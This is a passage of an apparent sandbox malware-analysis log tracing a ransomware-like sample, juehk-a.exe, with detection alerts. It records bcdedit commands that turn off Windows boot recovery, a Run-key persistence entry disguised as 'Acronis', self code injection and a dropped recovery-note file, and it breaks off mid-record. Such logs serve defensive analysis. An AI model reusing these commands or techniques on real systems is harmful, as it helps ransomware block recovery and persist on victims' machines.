2261.          timestamp: 35468
2262.          mode: started
2263.          sequenceNumber: 162
2264.          value: C:\Windows\System32\bcdedit.exe
2265.          pid: 2804
2266.          ppid: 1648
2267.          parentname: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
2268.          cmdline: bcdedit.exe /set {current} bootems off
2269.          filesize: 346112
2270.          md5sum: 780836bb63852990382df27de7fefd20
2271.          sha1sum: 6feedabbc6576a4bdc68935677b7a01f130b98f2
2272.            ads:
2273.          fid (ads:): 281474976780578
2274.        regkey:
2275.          randomized: true
2276.          mode: queryvalue
2277.          sequenceNumber: 163
2278.          timestamp: 35512
2279.          value: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\ComputerName\ActiveComputerName\"ComputerName"
2280.           processinfo:
2281.             pid: 2804
2282.             imagepath: C:\Windows\System32\bcdedit.exe
2283.             md5sum: 780836bb63852990382df27de7fefd20
2284.         regkey:
2285.           timestamp: 35622
2286.           mode: added
2287.           sequenceNumber: 164
2288.           value: \REGISTRY\MACHINE\BCD00000000\Objects\{92102341-c2c1-11e2-b94a-fece50bdaf86}\Elements\16000020
2289.           processinfo:
2290.             pid: 2804
2291.             imagepath: C:\Windows\System32\bcdedit.exe
2292.             md5sum: 780836bb63852990382df27de7fefd20
2293.         regkey:
2294.           timestamp: 35623
2295.           mode: setval
2296.           sequenceNumber: 165
2297.           value: \REGISTRY\MACHINE\BCD00000000\Objects\{92102341-c2c1-11e2-b94a-fece50bdaf86}\Elements\16000020\"Element" = 00
2298.          processinfo:
2299.            pid: 2804
2300.            imagepath: C:\Windows\System32\bcdedit.exe
2301.            md5sum: 780836bb63852990382df27de7fefd20
2302.        process:
2303.          timestamp: 35634
2304.          mode: terminated
2305.          sequenceNumber: 166
2306.          value: C:\Windows\System32\bcdedit.exe
2307.          pid: 2804
2308.          ppid: 1648
2309.          parentname: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
2310.          cmdline: N/A
2311.            ads:
2312.          fid (ads:): 281474976780578
2313.        apicall:
2314.          timestamp: 35638
2315.          sequenceNumber: 167
2316.          processinfo:
2317.            pid: 1648
2318.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
2319.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
2320.          dllname: kernel32.dll
2321.          apiname: Sleep
2322.          address: 0x0041dca8
2323.          params:
2324.            param (id:1): 1000
2325.        process:
2326.          timestamp: 36464
2327.          mode: started
2328.          sequenceNumber: 168
2329.          value: C:\Windows\System32\bcdedit.exe
2330.          pid: 2520
2331.          ppid: 1648
2332.          parentname: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
2333.          cmdline: bcdedit.exe /set {current} advancedoptions off
2334.          filesize: 346112
2335.          md5sum: 780836bb63852990382df27de7fefd20
2336.          sha1sum: 6feedabbc6576a4bdc68935677b7a01f130b98f2
2337.            ads:
2338.          fid (ads:): 281474976780578
2339.        regkey:
2340.          randomized: true
2341.          mode: queryvalue
2342.          sequenceNumber: 169
2343.          timestamp: 36505
2344.          value: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\ComputerName\ActiveComputerName\"ComputerName"
2345.           processinfo:
2346.             pid: 2520
2347.             imagepath: C:\Windows\System32\bcdedit.exe
2348.             md5sum: 780836bb63852990382df27de7fefd20
2349.         regkey:
2350.           timestamp: 36511
2351.           mode: added
2352.           sequenceNumber: 170
2353.           value: \REGISTRY\MACHINE\BCD00000000\Objects\{92102341-c2c1-11e2-b94a-fece50bdaf86}\Elements\16000040
2354.           processinfo:
2355.             pid: 2520
2356.             imagepath: C:\Windows\System32\bcdedit.exe
2357.             md5sum: 780836bb63852990382df27de7fefd20
2358.         regkey:
2359.           timestamp: 36514
2360.           mode: setval
2361.           sequenceNumber: 171
2362.           value: \REGISTRY\MACHINE\BCD00000000\Objects\{92102341-c2c1-11e2-b94a-fece50bdaf86}\Elements\16000040\"Element" = 00
2363.          processinfo:
2364.            pid: 2520
2365.            imagepath: C:\Windows\System32\bcdedit.exe
2366.            md5sum: 780836bb63852990382df27de7fefd20
2367.        process:
2368.          timestamp: 36522
2369.          mode: terminated
2370.          sequenceNumber: 172
2371.          value: C:\Windows\System32\bcdedit.exe
2372.          pid: 2520
2373.          ppid: 1648
2374.          parentname: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
2375.          cmdline: N/A
2376.            ads:
2377.          fid (ads:): 281474976780578
2378.        apicall:
2379.          timestamp: 36527
2380.          sequenceNumber: 173
2381.          processinfo:
2382.            pid: 1648
2383.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
2384.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
2385.          dllname: kernel32.dll
2386.          apiname: Sleep
2387.          address: 0x0041dca8
2388.          params:
2389.            param (id:1): 1000
2390.        process:
2391.          timestamp: 37329
2392.          mode: started
2393.          sequenceNumber: 174
2394.          value: C:\Windows\System32\bcdedit.exe
2395.          pid: 2616
2396.          ppid: 1648
2397.          parentname: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
2398.          cmdline: bcdedit.exe /set {current} optionsedit off
2399.          filesize: 346112
2400.          md5sum: 780836bb63852990382df27de7fefd20
2401.          sha1sum: 6feedabbc6576a4bdc68935677b7a01f130b98f2
2402.            ads:
2403.          fid (ads:): 281474976780578
2404.        regkey:
2405.          randomized: true
2406.          mode: queryvalue
2407.          sequenceNumber: 175
2408.          timestamp: 37373
2409.          value: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\ComputerName\ActiveComputerName\"ComputerName"
2410.           processinfo:
2411.             pid: 2616
2412.             imagepath: C:\Windows\System32\bcdedit.exe
2413.             md5sum: 780836bb63852990382df27de7fefd20
2414.         regkey:
2415.           timestamp: 37380
2416.           mode: added
2417.           sequenceNumber: 176
2418.           value: \REGISTRY\MACHINE\BCD00000000\Objects\{92102341-c2c1-11e2-b94a-fece50bdaf86}\Elements\16000041
2419.           processinfo:
2420.             pid: 2616
2421.             imagepath: C:\Windows\System32\bcdedit.exe
2422.             md5sum: 780836bb63852990382df27de7fefd20
2423.         regkey:
2424.           timestamp: 37380
2425.           mode: setval
2426.           sequenceNumber: 177
2427.           value: \REGISTRY\MACHINE\BCD00000000\Objects\{92102341-c2c1-11e2-b94a-fece50bdaf86}\Elements\16000041\"Element" = 00
2428.          processinfo:
2429.            pid: 2616
2430.            imagepath: C:\Windows\System32\bcdedit.exe
2431.            md5sum: 780836bb63852990382df27de7fefd20
2432.        process:
2433.          timestamp: 37392
2434.          mode: terminated
2435.          sequenceNumber: 178
2436.          value: C:\Windows\System32\bcdedit.exe
2437.          pid: 2616
2438.          ppid: 1648
2439.          parentname: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
2440.          cmdline: N/A
2441.            ads:
2442.          fid (ads:): 281474976780578
2443.        apicall:
2444.          timestamp: 37398
2445.          sequenceNumber: 179
2446.          processinfo:
2447.            pid: 1648
2448.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
2449.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
2450.          dllname: kernel32.dll
2451.          apiname: Sleep
2452.          address: 0x0041dca8
2453.          params:
2454.            param (id:1): 1000
2455.        process:
2456.          timestamp: 38214
2457.          mode: started
2458.          sequenceNumber: 180
2459.          value: C:\Windows\System32\bcdedit.exe
2460.          pid: 2792
2461.          ppid: 1648
2462.          parentname: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
2463.          cmdline: bcdedit.exe /set {current} bootstatuspolicy IgnoreAllFailures
2464.          filesize: 346112
2465.          md5sum: 780836bb63852990382df27de7fefd20
2466.          sha1sum: 6feedabbc6576a4bdc68935677b7a01f130b98f2
2467.            ads:
2468.          fid (ads:): 281474976780578
2469.        regkey:
2470.          randomized: true
2471.          mode: queryvalue
2472.          sequenceNumber: 181
2473.          timestamp: 38257
2474.          value: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\ComputerName\ActiveComputerName\"ComputerName"
2475.           processinfo:
2476.             pid: 2792
2477.             imagepath: C:\Windows\System32\bcdedit.exe
2478.             md5sum: 780836bb63852990382df27de7fefd20
2479.         regkey:
2480.           timestamp: 38263
2481.           mode: added
2482.           sequenceNumber: 182
2483.           value: \REGISTRY\MACHINE\BCD00000000\Objects\{92102341-c2c1-11e2-b94a-fece50bdaf86}\Elements\250000e0
2484.           processinfo:
2485.             pid: 2792
2486.             imagepath: C:\Windows\System32\bcdedit.exe
2487.             md5sum: 780836bb63852990382df27de7fefd20
2488.         regkey:
2489.           timestamp: 38263
2490.           mode: setval
2491.           sequenceNumber: 183
2492.           value: \REGISTRY\MACHINE\BCD00000000\Objects\{92102341-c2c1-11e2-b94a-fece50bdaf86}\Elements\250000e0\"Element" = 01 00 00 00 00 00 00 00
2493.          processinfo:
2494.            pid: 2792
2495.            imagepath: C:\Windows\System32\bcdedit.exe
2496.            md5sum: 780836bb63852990382df27de7fefd20
2497.        process:
2498.          timestamp: 38275
2499.          mode: terminated
2500.          sequenceNumber: 184
2501.          value: C:\Windows\System32\bcdedit.exe
2502.          pid: 2792
2503.          ppid: 1648
2504.          parentname: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
2505.          cmdline: N/A
2506.            ads:
2507.          fid (ads:): 281474976780578
2508.        apicall:
2509.          timestamp: 38279
2510.          sequenceNumber: 185
2511.          processinfo:
2512.            pid: 1648
2513.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
2514.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
2515.          dllname: kernel32.dll
2516.          apiname: Sleep
2517.          address: 0x0041dca8
2518.          params:
2519.            param (id:1): 1000
2520.        process:
2521.          timestamp: 39092
2522.          mode: started
2523.          sequenceNumber: 186
2524.          value: C:\Windows\System32\bcdedit.exe
2525.          pid: 2976
2526.          ppid: 1648
2527.          parentname: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
2528.          cmdline: bcdedit.exe /set {current} recoveryenabled off
2529.          filesize: 346112
2530.          md5sum: 780836bb63852990382df27de7fefd20
2531.          sha1sum: 6feedabbc6576a4bdc68935677b7a01f130b98f2
2532.            ads:
2533.          fid (ads:): 281474976780578
2534.        regkey:
2535.          randomized: true
2536.          mode: queryvalue
2537.          sequenceNumber: 187
2538.          timestamp: 39136
2539.          value: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\ComputerName\ActiveComputerName\"ComputerName"
2540.           processinfo:
2541.             pid: 2976
2542.             imagepath: C:\Windows\System32\bcdedit.exe
2543.             md5sum: 780836bb63852990382df27de7fefd20
2544.         regkey:
2545.           timestamp: 39144
2546.           mode: setval
2547.           sequenceNumber: 188
2548.           value: \REGISTRY\MACHINE\BCD00000000\Objects\{92102341-c2c1-11e2-b94a-fece50bdaf86}\Elements\16000009\"Element" = 00
2549.          processinfo:
2550.            pid: 2976
2551.            imagepath: C:\Windows\System32\bcdedit.exe
2552.            md5sum: 780836bb63852990382df27de7fefd20
2553.        process:
2554.          timestamp: 39153
2555.          mode: terminated
2556.          sequenceNumber: 189
2557.          value: C:\Windows\System32\bcdedit.exe
2558.          pid: 2976
2559.          ppid: 1648
2560.          parentname: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
2561.          cmdline: N/A
2562.            ads:
2563.          fid (ads:): 281474976780578
2564.        apicall:
2565.          timestamp: 39154
2566.          sequenceNumber: 190
2567.          processinfo:
2568.            pid: 1648
2569.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
2570.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
2571.          dllname: kernel32.dll
2572.          apiname: Sleep
2573.          address: 0x0041dca8
2574.          params:
2575.            param (id:1): 1000
2576.        regkey:
2577.          timestamp: 39932
2578.          mode: added
2579.          sequenceNumber: 191
2580.          value: \REGISTRY\USER\S-1-5-21-2529703413-2662079939-3113469119-500\Software\zsys\
2581.          processinfo:
2582.            pid: 1648
2583.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
2584.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
2585.        file:
2586.          timestamp: 39937
2587.          mode: failed
2588.          sequenceNumber: 192
2589.          value: C:\Users\Administrator\AppData\Roaming\NETAPI32.DLL
2590.          processinfo:
2591.            tainted: true
2592.            pid: 1648
2593.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
2594.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
2595.            ads:
2596.          fid (ads:): 0
2597.          failure: open
2598.          ntstatus: 0xc0000034
2599.          CreateOptions: 0x200000
2600.          PE:
2601.            InspectionType: Ext
2602.        file:
2603.          timestamp: 40008
2604.          mode: failed
2605.          sequenceNumber: 193
2606.          value: C:\Users\Administrator\AppData\Roaming\NETUTILS.DLL
2607.          processinfo:
2608.            tainted: true
2609.            pid: 1648
2610.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
2611.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
2612.            ads:
2613.          fid (ads:): 0
2614.          failure: open
2615.          ntstatus: 0xc0000034
2616.          CreateOptions: 0x200000
2617.          PE:
2618.            InspectionType: Ext
2619.        file:
2620.          timestamp: 40028
2621.          mode: failed
2622.          sequenceNumber: 194
2623.          value: C:\Users\Administrator\AppData\Roaming\SRVCLI.DLL
2624.          processinfo:
2625.            tainted: true
2626.            pid: 1648
2627.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
2628.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
2629.            ads:
2630.          fid (ads:): 0
2631.          failure: open
2632.          ntstatus: 0xc0000034
2633.          CreateOptions: 0x200000
2634.          PE:
2635.            InspectionType: Ext
2636.        file:
2637.          timestamp: 40045
2638.          mode: failed
2639.          sequenceNumber: 195
2640.          value: C:\Users\Administrator\AppData\Roaming\WKSCLI.DLL
2641.          processinfo:
2642.            tainted: true
2643.            pid: 1648
2644.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
2645.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
2646.            ads:
2647.          fid (ads:): 0
2648.          failure: open
2649.          ntstatus: 0xc0000034
2650.          CreateOptions: 0x200000
2651.          PE:
2652.            InspectionType: Ext
2653.        file:
2654.          timestamp: 40154
2655.          mode: failed
2656.          sequenceNumber: 196
2657.          value: C:\Users\Administrator\AppData\Roaming\SCHEDCLI.DLL
2658.          processinfo:
2659.            tainted: true
2660.            pid: 1648
2661.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
2662.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
2663.            ads:
2664.          fid (ads:): 0
2665.          failure: open
2666.          ntstatus: 0xc0000034
2667.          CreateOptions: 0x200000
2668.          PE:
2669.            InspectionType: Ext
2670.        apicall:
2671.          timestamp: 40266
2672.          sequenceNumber: 197
2673.          processinfo:
2674.            pid: 1648
2675.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
2676.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
2677.          dllname: kernel32.dll
2678.          apiname: GetComputerNameExW
2679.          address: 0x76e7ce4b
2680.          params:
2681.            param (id:1): 0
2682.            param (id:2): 0x76f10a6c
2683.            param (id:3): 0x76f101c0
2684.        apicall:
2685.          timestamp: 40682
2686.          sequenceNumber: 198
2687.          processinfo:
2688.            pid: 1648
2689.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
2690.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
2691.          dllname: advapi32.dll
2692.          apiname: CryptAcquireContextW
2693.          address: 0x0041b858
2694.          params:
2695.            param (id:1): NULL
2696.            param (id:2): NULL
2697.            param (id:3): 1
2698.            param (id:4): 4026531840
2699.        file:
2700.          timestamp: 40697
2701.          mode: failed
2702.          sequenceNumber: 199
2703.          value: C:\Users\Administrator\AppData\Roaming\CRYPTSP.DLL
2704.          processinfo:
2705.            tainted: true
2706.            pid: 1648
2707.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
2708.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
2709.            ads:
2710.          fid (ads:): 0
2711.          failure: open
2712.          ntstatus: 0xc0000034
2713.          CreateOptions: 0x200000
2714.          PE:
2715.            InspectionType: Ext
2716.        apicall:
2717.          timestamp: 40822
2718.          sequenceNumber: 200
2719.          processinfo:
2720.            pid: 1648
2721.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
2722.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
2723.          dllname: kernel32.dll
2724.          apiname: Process32First
2725.          address: 0x0041bb04
2726.          params:
2727.            param (id:1): 0x1ec
2728.            param (id:2): 0x18d4c8
2729.        malicious-alert:
2730.          classtype: Generic-Anomalous-Activity
2731.          weight: 0
2732.          ruleid: 8007 : Enumerating running processes ; Process is enumerating running processes
2733.          msg: Process is enumerating running processes
2734.          display-msg: Enumerating running processes
2735.        regkey:
2736.          timestamp: 40841
2737.          mode: setval
2738.          sequenceNumber: 201
2739.          value: \REGISTRY\USER\S-1-5-21-2529703413-2662079939-3113469119-500\Software\zsys\"ID" = 71 56 41 eb 01 82 d4 4e
2740.           processinfo:
2741.             pid: 1648
2742.             imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
2743.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
2744.         regkey:
2745.           timestamp: 40882
2746.           mode: added
2747.           sequenceNumber: 202
2748.           value: \REGISTRY\USER\S-1-5-21-2529703413-2662079939-3113469119-500\Software\715641EB182D44E
2749.           processinfo:
2750.             pid: 1648
2751.             imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
2752.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
2753.         regkey:
2754.           timestamp: 40897
2755.           mode: setval
2756.           sequenceNumber: 203
2757.           value: \REGISTRY\USER\S-1-5-21-2529703413-2662079939-3113469119-500\Software\715641EB182D44E\"data" = 31 4a 46 4c 46 53 5a 59 41 48 35 52 69 65 4d 64 34 39 56 63 75 41 4a 6b 38 73 37 78 65 6d 6e 46 41 57 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 cc 97 27 53 35 19 85 0f 5d 87 18 12 85 32 1e 69 a8 dd f6 0f 7b 82 47 19 74 71 e9 f6 06 64 eb 98 46 e1 bf 5a d1 c4 4f d2 5a 52 2e 6d 40 80 e7 d3 de 4d 9f 4d 74 f6 9c 3f 2f 34 c9 af 41 37 ad 33 00 00 33 39 31 42 41 38 43 44 30 31 42 44 30 42 37 39 41 46 39 31 42 35 31 46 30 38 45 35 36 35 32 36 31 44 38 31 43 44 41 32 38 35 46 36 46 45 41 35 43 41 44 35 32 43 31 31 46 31 42 35 31 37 43 32 35 45 44 37 30 33 38 44 35 38 46 41 30 35 37 43 30 33 46 38 34 39 38 43 31 46 43 33 36 33 35 37 38 38 33 35 30 32 44 45 46 41 43 46 39 39 44 43 41 44 34 45 43 45 46 46 41 36 45 42 44 37 41 30 00 00 00 00 04 98 8b ca e1 f5 a2 4e 87 7f c3 26 3c d1 84 74 24 e3 e7 f3 bf ab 7c 09 36 4b f4 60 e3 16 bc ca d8 71 92 28 25 9d 15 f0 09 cb 93 eb a1 a!
2758. 2 65 3a 87 09 c1 dd ae 91 65 22 2c eb 4d c1 05 12 d0 b0 cf 00 00 00 00 00 00 00 00 7e 79 62 56 00 00 00 00
2759.          processinfo:
2760.            pid: 1648
2761.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
2762.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
2763.        regkey:
2764.          timestamp: 40934
2765.          mode: setval
2766.          sequenceNumber: 204
2767.          value: \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\"EnableLinkedConnections" = 0x00000001
2768.           processinfo:
2769.             pid: 1648
2770.             imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
2771.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
2772.         malicious-alert:
2773.           classtype: misc-anom
2774.           weight: 100
2775.           ruleid: 10068 : Process deleting itself ;  Process deleting itself in any manor
2776.           msg: Process deleting itself in any manor
2777.           display-msg: Process deleting itself
2778.         regkey:
2779.           timestamp: 41244
2780.           mode: setval
2781.           sequenceNumber: 205
2782.           value: \REGISTRY\USER\S-1-5-21-2529703413-2662079939-3113469119-500\Software\Microsoft\Windows\CurrentVersion\Run\"Acronis" = C:\Users\Administrator\AppData\Roaming\juehk-a.exe
2783.          processinfo:
2784.            pid: 1648
2785.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
2786.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
2787.        apicall:
2788.          timestamp: 41553
2789.          sequenceNumber: 206
2790.          processinfo:
2791.            pid: 1648
2792.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
2793.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
2794.          dllname: advapi32.dll
2795.          apiname: CryptAcquireContextA
2796.          address: 0x00412b8f
2797.          params:
2798.            param (id:1): NULL
2799.            param (id:2): NULL
2800.            param (id:3): 1
2801.            param (id:4): 4026531840
2802.        codeinjection:
2803.          timestamp: 41581
2804.          suppressed: false
2805.          mode: multiple memory write with inline-hook code injection
2806.          sequenceNumber: 207
2807.          source:
2808.            tainted: true
2809.            processinfo:
2810.              pid: 2824
2811.              imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
2812.              md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
2813.          target:
2814.            tainted: true
2815.            processinfo:
2816.              pid: 1648
2817.              imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
2818.              md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
2819.        malicious-alert:
2820.          classtype: Code-Injection-Tracking
2821.          weight: 0
2822.          ruleid: 4610 : Code Injection Obsevered ; Self Code Injection Tracking
2823.          msg: Self Code Injection Tracking
2824.          display-msg: Code Injection Obsevered
2825.        malicious-alert:
2826.          classtype: misc-anom
2827.          weight: 100
2828.          ruleid: 10111 : Suspicious Code Injection ; Suspicious Self Code Injection
2829.          msg: Suspicious Self Code Injection
2830.          display-msg: Suspicious Code Injection
2831.        malicious-alert:
2832.          classtype: Code-Injection-Activity
2833.          weight: 0
2834.          ruleid: 4611 : Code Injection Detected ; Process performing multiple memory write with inline-hook code injection
2835.          msg: Process performing multiple memory write with inline-hook code injection
2836.          display-msg: Code Injection Detected
2837.        file:
2838.          timestamp: 41588
2839.          mode: failed
2840.          sequenceNumber: 208
2841.          value: C:\Users\Administrator\AppData\Roaming\PROPSYS.DLL
2842.          processinfo:
2843.            tainted: true
2844.            pid: 1648
2845.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
2846.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
2847.            ads:
2848.          fid (ads:): 0
2849.          failure: open
2850.          ntstatus: 0xc0000034
2851.          CreateOptions: 0x200000
2852.          PE:
2853.            InspectionType: Ext
2854.        apicall:
2855.          timestamp: 41852
2856.          repeat: 20
2857.          sequenceNumber: 209
2858.          processinfo:
2859.            pid: 1648
2860.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
2861.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
2862.          dllname: kernel32.dll
2863.          apiname: Sleep
2864.          address: 0x0042207d
2865.        file:
2866.          timestamp: 41856
2867.          mode: created
2868.          sequenceNumber: 210
2869.          value: C:\Users\Administrator\Documents\recover_file_cbqytmunq.txt
2870.          processinfo:
2871.            pid: 1648
2872.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
2873.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
2874.            ads:
2875.          fid (ads:): 1125899906942061
2876.          ntstatus: 0x0
2877.          CreateOptions: 0x60
2878.        file:
2879.          timestamp: 41867
2880.          mode: close
2881.          sequenceNumber: 211
2882.          value: C:\Users\Administrator\Documents\recover_file_cbqytmunq.txt
2883.          filesize: 253
2884.          md5sum: 6147e70ea3212edeacd58e93a57c7b27
2885.          sha1sum: 13583ee3327eccebd784ca18ed2da1eb7d860d57
2886.          processinfo:
2887.            pid: 1648
2888.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
2889.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
2890.            ads:
2891.          fid (ads:): 1125899906942061
2892.          ntstatus: 0x0
2893.          CreateOptions: 0x0
2894.        codeinjection:
2895.          timestamp: 41872
2896.          suppressed: false
2897.          mode: multiple memory write with inline-hook code injection
2898.          sequenceNumber: 212
2899.          source:
2900.            tainted: true
2901.            processinfo:
2902.              pid: 2824
2903.              imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
2904.              md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
2905.          target:
2906.            tainted: true
2907.            processinfo:
2908.              pid: 1648
2909.              imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
2910.              md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
2911.        codeinjection:
2912.          timestamp: 41877
2913.          suppressed: false
2914.          mode: multiple memory write with inline-hook code injection
2915.          sequenceNumber: 213
2916.          source:
2917.            tainted: true
2918.            processinfo:
2919.              pid: 2824
2920.              imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
2921.              md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
2922.          target:
2923.            tainted: true
2924.            processinfo:
2925.              pid: 1648
2926.              imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
2927.              md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
2928.        codeinjection:
2929.          timestamp: 41884
2930.          suppressed: false
2931.          mode: multiple memory write with inline-hook code injection
2932.          sequenceNumber: 214
2933.          source:
2934.            tainted: true
2935.            processinfo:
2936.              pid: 2824
2937.              imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
2938.              md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
2939.          target:
2940.            tainted: true
2941.            processinfo:
2942.              pid: 1648
2943.              imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
2944.              md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
2945.        file:
2946.          timestamp: 41896
2947.          mode: failed
2948.          sequenceNumber: 215
2949.          value: C:\Users\Administrator\AppData\Roaming\SECUR32.DLL
2950.          processinfo:
2951.            tainted: true
2952.            pid: 1648
2953.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
2954.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
2955.            ads:
2956.          fid (ads:): 0
2957.          failure: open
2958.          ntstatus: 0xc0000034
2959.          CreateOptions: 0x200000
2960.          PE:
2961.            InspectionType: Ext
2962.        file:
2963.          timestamp: 41900
2964.          mode: failed
2965.          sequenceNumber: 216
2966.          value: C:\Users\Administrator\AppData\Roaming\API-MS-WIN-DOWNLEVEL-ADVAPI32-L2-1-0.DLL
2967.          processinfo:
2968.            tainted: true
2969.            pid: 1648
2970.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
2971.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
2972.            ads:
2973.          fid (ads:): 0
2974.          failure: open
2975.          ntstatus: 0xc0000034
2976.          CreateOptions: 0x200000
2977.          PE:
2978.            InspectionType: Ext
2979.        file:
2980.          timestamp: 41905
2981.          mode: open
2982.          sequenceNumber: 217
2983.          value: C:\Users\Administrator\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat
2984.          filesize: 128
2985.          processinfo:
2986.            pid: 1648
2987.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
2988.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
2989.            ads:
2990.          fid (ads:): 5910974511006141
2991.          ntstatus: 0x0
2992.          CreateOptions: 0x60
2993.        process:
2994.          timestamp: 41910
2995.          mode: opened
2996.          sequenceNumber: 218
2997.          desiredaccess: 0x02000030
2998.          ntstatus: 0xc0000022
2999.          target:
3000.            processinfo:
3001.              pid: 4
3002.              tid: 0
3003.              imagepath: N/A
3004.          source:
3005.            processinfo:
3006.              pid: 1648
3007.              imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
3008.              md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
3009.        process:
3010.          timestamp: 41914
3011.          mode: opened
3012.          sequenceNumber: 219
3013.          desiredaccess: 0x02000030
3014.          ntstatus: 0x00000000
3015.          target:
3016.            processinfo:
3017.              pid: 264
3018.              imagepath: C:\Windows\System32\smss.exe
3019.              md5sum: 1911a3356fa3f77ccc825ccbac038c2a
3020.          source:
3021.            processinfo:
3022.              pid: 1648
3023.              imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
3024.              md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
3025.        process:
3026.          timestamp: 41920
3027.          mode: opened
3028.          sequenceNumber: 220
3029.          desiredaccess: 0x02000030
3030.          ntstatus: 0x00000000
3031.          target:
3032.            processinfo:
3033.              pid: 348
3034.              imagepath: C:\Windows\System32\csrss.exe
3035.              md5sum: 60c2862b4bf0fd9f582ef344c2b1ec72
3036.          source:
3037.            processinfo:
3038.              pid: 1648
3039.              imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
3040.              md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
3041.        process:
3042.          timestamp: 41925
3043.          mode: opened
3044.          sequenceNumber: 221
3045.          desiredaccess: 0x02000030
3046.          ntstatus: 0x00000000
3047.          target:
3048.            processinfo:
3049.              pid: 376
3050.              imagepath: C:\Windows\System32\wininit.exe
3051.              md5sum: 94355c28c1970635a31b3fe52eb7ceba
